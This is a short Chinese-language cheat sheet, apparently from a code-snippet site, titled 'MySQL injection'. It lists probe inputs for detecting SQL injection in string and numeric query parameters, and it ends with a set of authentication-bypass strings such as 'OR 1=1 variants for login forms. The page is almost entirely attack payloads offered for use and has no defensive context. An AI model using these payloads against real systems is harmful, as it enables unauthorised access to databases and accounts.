首页 > 代码库 > MySQL注入

MySQL注入

mysql-数据库---需要root权限读取
information schema--数据库--在5以上的版本中存在

三种情况:
1.字符串类型查询时:
    ‘    假
    ‘‘    真
    "    假
    ""    假
    \    假
    \\    真
2.数组类型查询时:
    AND 1        真
    AND 0        假
    AND true    真
    AND false    假
    1-false        有问题时返回1的结果
    1-true        有问题时返回0的结果
    2-1        返回1相同代表可能存在问题
    1*56        返回与56相同代表
    1*56        返回与1相同代表没有问题
3.登录时:
‘OR‘1
‘OR 1-- -
"OR""="
"OR 1=1---
‘=‘
‘LIKE’
‘=0--+

 

MySQL注入